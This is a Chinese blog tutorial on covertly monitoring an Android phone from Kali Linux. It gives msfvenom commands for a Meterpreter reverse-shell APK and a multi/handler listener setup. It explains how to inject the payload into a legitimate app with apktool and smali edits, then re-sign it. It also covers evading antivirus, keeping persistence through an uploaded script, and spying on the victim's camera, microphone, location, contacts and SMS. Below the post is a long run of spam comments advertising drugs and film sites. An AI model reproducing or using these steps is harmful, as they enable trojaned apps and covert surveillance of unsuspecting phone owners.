kali远端监控android

博主： miao_o
发布时间：2017 年 07 月 08 日
53673次浏览
125 条评论
2770字数
分类：教程渗透笔记

kali是不容多说的渗透测试系统了自己总结一下一些通过注入payload来实现监听Android的一些经验了

基本操作

首先是生成注入payload的小马apk（4444是监听端口）

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LRT=4444 R>app.apk

查看本地地址
ifconfig
打开msfconsole来设置监听
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.xxx（刚才的本地监听地址）
set LPORT 4444
然后查看show options是否设置无误之后在监听设备上安装好小马给予全部权限并打开一次应用
然后监听端/exploit
然后华丽丽的看到了各种可执行命令的帮助，查看文件，远程执行命令，录音，摄像，定位，查看联系人、通话记录、短信系统信息什么的剩下的就没什么好说的了需要注意的是打开摄像头执行/webcam_snap -i 1 先要webcam_snap info查看设备摄像头在根据情况来选择1/2/3

进阶

毕竟也没那么容易让目标安装，所以我们要将之前生成的小马注入到其他app内。可行的话可以替换字符来达到免杀，这点我也没试过，不过也有一些免杀工具，不过没过多久就失效了。还有一些问题，比如监听的app很容易被杀失去连接，也很难让目标持续打开应用。针对以上问题可以用以下方法解决
要将小马注入其他apk中，首先和之前一样生成一个注入payload的apk，例如名为pentestlab

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=4444 R > pentestlab.apk

然后用apktool反翻译pentestlab和目标target

java -jar apktool.jar d -f -o payload /root/Downloads/pentestlab.apk java -jar apktool.jar d -f -o payload /root/Downloads/target.apk 之后提取pentestlab的smail
/root/Downloads/payload/smali/com/metasploit/stage /root/Downloads/original/smali/com/metasploit/stage

然后hook找到target的MainActivity位置

在MainActivity搜索onCreate并添加一行

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

最后在target的Manifest.xml添加payload所需的权限

回编译java -jar apktool.jar b /root/appname

生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222
签名：jarsigner -keystore mykey.keystore apkname.apk alias_name -sigalg MD5withRSA -digestalg SHA1
大功告成不过目标应用尽量选些简单的，混淆加固了就不好弄了，当初就吃了这种亏
还有以下简单的方法注入目标app，不过现在apk都结实了我没成功
msfvenom -x 1.apk -p android/meterpreter/reverse_https LHOST=xxxx LPORT=xxx -o a.apk 至于监听断掉已经有人通过执行脚本解决了
再启动监听是快速执行以下脚本

meterpreter > pwd 找到当前路径
/data/user/0/com.baidu.flashlight/files
meterpreter > cd /data/user/0/com.baidu.flashlight/files
meterpreter >
meterpreter > upload /root/桌面/chixu.sh 上传脚本
[*] uploading : /root/桌面/chixu.sh -> chixu.sh
[*] uploaded : /root/桌面/chixu.sh -> chixu.sh
meterpreter > shell
Process 1 created.
Channel 2 created.
pwd
/
cd /data/user/0/com.baidu.flashlight/files 找到脚本所在文件夹
ls
be03bdfb7aec72fd9195311f2656619a
chixu.sh
sh chixu.sh

最后要说的：很多地方也没有说很清楚，没有什么技术含量，我也是向其他人学习的，YouTube也上有不少教程，真的要是监听的话还是要备个vps远程监听比较好，可以参考http://t.cn/RSgE7uE 其他参考建议参考http://t.cn/Rahxkmk http://t.cn/RKA5QeF

最后修改：2018 年 10 月 29 日 06 : 55 PM

125 条评论

sY5am
August 10th, 2022 at 10:07 pm

sY5am

回复
stat.netstate.ru
August 6th, 2022 at 12:44 pm

stat.netstate.ru

回复
filmgoda.ru
August 5th, 2022 at 07:36 pm

filmgoda.ru

回复
rodnoe-kino-ru
August 4th, 2022 at 05:32 am

rodnoe-kino-ru

回复
filmgoda.ru
August 3rd, 2022 at 07:55 pm

filmgoda.ru

回复
filmgoda.ru
August 3rd, 2022 at 06:58 pm

filmgoda.ru

回复
filmgoda.ru
August 3rd, 2022 at 06:12 pm

filmgoda.ru

回复
filmgoda.ru
August 3rd, 2022 at 04:06 pm

filmgoda.ru

回复
filmgoda.ru
August 3rd, 2022 at 11:19 am

filmgoda.ru

回复
cleantalkorg2.ru
August 2nd, 2022 at 07:11 am

cleantalkorg2.ru

回复
cleantalkorg2.ru
August 2nd, 2022 at 02:28 am

cleantalkorg2.ru

回复
cleantalkorg2.ru
August 2nd, 2022 at 12:55 am

cleantalkorg2.ru

回复
smotret-polnyj-film-smotret-v-khoroshem-kachestve
July 31st, 2022 at 04:07 am

smotret-polnyj-film-smotret-v-khoroshem-kachestve

回复
liusia-8-seriiaonlain
July 30th, 2022 at 12:15 am

liusia-8-seriiaonlain

回复
site
July 24th, 2022 at 11:38 pm

site

回复
site
July 24th, 2022 at 10:45 pm

site

回复
film
July 20th, 2022 at 05:15 pm

film

回复
video
July 18th, 2022 at 11:42 am

video

回复
film.8filmov.ru
July 17th, 2022 at 12:36 am

film.8filmov.ru

回复
film.8filmov.ru
July 16th, 2022 at 03:20 pm

film.8filmov.ru

回复
web
July 15th, 2022 at 11:25 pm

web

回复
mir dikogo zapada 4 sezon 4 seriya
July 14th, 2022 at 11:07 pm

mir dikogo zapada 4 sezon 4 seriya

回复
stats
July 14th, 2022 at 09:50 am

stats

回复
gidonline
July 11th, 2022 at 07:05 am

gidonline

回复
movies
July 11th, 2022 at 05:53 am

movies

回复
revatio
July 11th, 2022 at 05:53 am

revatio

回复
Ukraine-war
July 11th, 2022 at 12:58 am

Ukraine-war

回复
UKRAINE
July 10th, 2022 at 11:14 am

UKRAINE

回复
UKRAINE
July 10th, 2022 at 02:26 am

UKRAINE

回复
UKRAINE
July 10th, 2022 at 12:26 am

UKRAINE

回复
UKRAINE
July 9th, 2022 at 11:12 pm

UKRAINE

回复
site
July 7th, 2022 at 09:27 pm

site

回复
stats
July 7th, 2022 at 12:56 pm

stats

回复
site
July 7th, 2022 at 01:25 am

site

回复
sildenafil citrate
July 6th, 2022 at 10:10 pm

sildenafil citrate

回复
site
July 6th, 2022 at 12:59 pm

site

回复
site
July 6th, 2022 at 08:46 am

site

回复
site
July 6th, 2022 at 08:03 am

site

回复
site
July 6th, 2022 at 06:54 am

site

回复
site
July 6th, 2022 at 05:56 am

site

回复
site
July 6th, 2022 at 05:11 am

site

回复
viagra
July 5th, 2022 at 08:41 pm

viagra

回复
psikholog
July 3rd, 2022 at 09:20 am

psikholog

回复
The Latest Ukraine News
July 3rd, 2022 at 12:39 am

The Latest Ukraine News

回复
Ukraine-Russia
July 2nd, 2022 at 10:08 pm

Ukraine-Russia

回复
Ukraine
July 2nd, 2022 at 08:47 pm

Ukraine

回复
War in Ukraine
July 2nd, 2022 at 08:02 pm

War in Ukraine

回复
bucha killings
July 2nd, 2022 at 07:12 pm

bucha killings

回复
cleantalkorg2.ru
July 1st, 2022 at 12:20 am

cleantalkorg2.ru

回复
cleantalkorg2.ru
June 30th, 2022 at 07:59 pm

cleantalkorg2.ru

回复
bit.ly
June 29th, 2022 at 06:11 am

bit.ly

回复
bit.ly
June 28th, 2022 at 10:59 pm

bit.ly

回复
bit.ly
June 28th, 2022 at 10:08 pm

bit.ly

回复
bit.ly
June 28th, 2022 at 05:03 pm

bit.ly

回复
bit.ly
June 28th, 2022 at 04:18 pm

bit.ly

回复
chelovek soznaniye mozg
June 27th, 2022 at 04:16 am

chelovek soznaniye mozg

回复
chelovek soznaniye mozg
June 26th, 2022 at 10:42 pm

chelovek soznaniye mozg

回复
psy
June 26th, 2022 at 09:54 pm

psy

回复
psy
June 26th, 2022 at 09:01 pm

psy

回复
psy
June 26th, 2022 at 07:42 pm

psy

回复
psy
June 26th, 2022 at 06:30 pm

psy

回复
psy
June 26th, 2022 at 05:34 pm

psy

回复
tor-lyubov-i-grom.ru
June 25th, 2022 at 03:57 pm

tor-lyubov-i-grom.ru

回复
Link
June 21st, 2022 at 11:07 pm

Link

回复
https://bit.ly/psikholog-muzhchina-onlayn
June 19th, 2022 at 09:41 pm

https://bit.ly/psikholog-muzhchina-onlayn

回复
netstate.ru
June 18th, 2022 at 03:37 am

netstate.ru

回复
Psikholog
June 16th, 2022 at 03:08 pm

Psikholog

回复
hdorg2.ru
June 15th, 2022 at 05:18 pm

hdorg2.ru

回复
hd-tor-2022
June 15th, 2022 at 03:45 pm

hd-tor-2022

回复
film-tor-2022
June 15th, 2022 at 03:09 pm

film-tor-2022

回复
tor-lyubov-i-grom
June 15th, 2022 at 02:33 pm

tor-lyubov-i-grom

回复
01211
June 15th, 2022 at 02:41 am

01211 21546

回复
01211
June 15th, 2022 at 01:32 am

01211 21546

回复
3NOZC44
June 14th, 2022 at 11:25 pm

3NOZC44

回复
3NOZC44
June 14th, 2022 at 09:44 pm

3NOZC44

回复
3Hk12Bl
June 14th, 2022 at 08:33 pm

3Hk12Bl

回复
chelovek-iz-90-h
June 12th, 2022 at 04:37 pm

chelovek-iz-90-h

回复
russianmanagement.com
June 12th, 2022 at 03:25 pm

russianmanagement.com

回复
russianmanagement.com
June 12th, 2022 at 01:27 pm

russianmanagement.com

回复
Shkala tonov
June 12th, 2022 at 10:16 am

Shkala tonov

回复
SHKALA TONOV
June 12th, 2022 at 02:05 am

SHKALA TONOV

回复
https://ria.ru/20100906/272903623.html
June 11th, 2022 at 11:18 pm

https://ria.ru/20100906/272903623.html

回复
http://bit.ly/odna-film
June 11th, 2022 at 10:18 pm

http://bit.ly/odna-film

回复
D6tuzANh
June 11th, 2022 at 08:58 am

D6tuzANh

回复
qQ8KZZE6
June 11th, 2022 at 08:16 am

qQ8KZZE6

回复
DPTPtNqS
June 11th, 2022 at 05:34 am

DPTPtNqS

回复
uels ukrain
June 5th, 2022 at 07:46 pm

uels ukrain

回复
slovar po psihoanalizu laplansh
June 2nd, 2022 at 08:02 pm

slovar po psihoanalizu laplansh

回复
is celebrex addictive
March 6th, 2022 at 03:05 am

is celebrex addictive

回复
azithromycin ivermectin
March 3rd, 2022 at 11:17 am

azithromycin ivermectin

回复
omnicef mg
March 3rd, 2022 at 02:26 am

omnicef mg

回复
omnicef fda
March 2nd, 2022 at 09:58 pm

omnicef fda

回复
zithromax g6pd
March 2nd, 2022 at 03:23 am

zithromax g6pd

回复
cephalexin klebsiella
March 2nd, 2022 at 12:28 am

cephalexin klebsiella

回复
azithromycin overdose
March 1st, 2022 at 07:36 pm

azithromycin overdose

回复
azithromycin
February 21st, 2022 at 10:50 am

azithromycin

回复
ciprofloxacin medscape
February 21st, 2022 at 09:51 am

ciprofloxacin medscape

回复
flagyl diarrhea
February 20th, 2022 at 08:51 pm

flagyl diarrhea

回复
azithromycin sds
February 20th, 2022 at 03:41 am

azithromycin sds

回复
cialis 200mg
February 10th, 2022 at 08:18 am

cialis 200mg

回复
meloxicam high risk
January 24th, 2022 at 04:31 pm

meloxicam high risk

回复
viagra for girls
January 18th, 2022 at 02:35 am

viagra for girls

回复
price of generic cialis at walmart
January 18th, 2022 at 12:32 am

cialis over counter

回复
cialis tablets australia
January 17th, 2022 at 02:54 am

cialis tablets australia

回复
interactions for sildenafil
January 12th, 2022 at 02:18 pm

interactions for sildenafil

回复
azithromycin 500 mg tablet
January 4th, 2022 at 11:10 am

azithromycin 500 mg tablet

回复
acheter cialis
January 2nd, 2022 at 01:34 pm

acheter cialis

回复
best viagra generic
November 27th, 2021 at 01:36 pm

best viagra generic

回复
tadalafil generic pills
November 26th, 2021 at 04:31 pm

tadalafil generic pills

回复
online drugstore cialis
November 24th, 2021 at 05:29 am

online drugstore cialis

回复
cialis dosage tadalafpis
August 22nd, 2021 at 01:03 am

cialis dosage tadalafpis

回复
stromectol demodex
June 15th, 2021 at 08:56 am

ivermectin over the counter

回复
tadalafil over the counter
June 10th, 2021 at 02:57 am

tadalafil over the counter

回复
fildena super active 100 mg
June 9th, 2021 at 02:14 am

fildena 100 mg for sale

回复
order stromectol online for humans
June 4th, 2021 at 05:35 am

stromectol when your not contagious anymore

回复
fildena 50 mg
June 1st, 2021 at 05:19 am

fildena chewable

回复
cialis without a doctor prescription usa
May 29th, 2021 at 07:13 pm

cialis 10mg side effects last post - cialis from canada pharmacy log out - buy cialis online

回复
tadalafil cost at walmart
May 26th, 2021 at 05:08 am

cialis generic tadalafil

回复
i have a existing prescription for viagra how do i use
May 16th, 2021 at 07:26 am

whats the easyest way to get viagra prescription

回复
cialis with prescription cheap
May 15th, 2021 at 08:30 am

generic cialis without a doctors prescription

回复
what is ivermectin
May 13th, 2021 at 09:30 am

coronavirus ivermectin

回复
how to take sildenafil 100mg
May 10th, 2021 at 05:01 am

sildenafil citrate 20 mg tablet

回复
cialis over counter walmart
April 30th, 2021 at 07:25 pm

cialis walmart

回复
when will generic cialis be available
January 14th, 2021 at 10:31 pm

cialis

回复
cialis no prescription
January 6th, 2021 at 10:44 pm

cialis 20mg dosage topics - cialis palpitations - price of cialis

回复

kali远端监控android

基本操作

进阶

125 条评论

发表评论取消回复

kali远端监控android

长城跨境通零门槛跨境Visa/万事达借记卡

openVPN使用教程

ANDRAX安卓渗透测试平台安装初探

Ubuntu安装kali工具集 katoolin

博客相关telegram

从零搭建Typecho博客

雨后街道

此内容被密码保护

kali远端监控android

kali远端监控android

基本操作

进阶

基本操作

进阶

125 条评论

发表评论 取消回复

kali远端监控android

基本操作

进阶

发表评论取消回复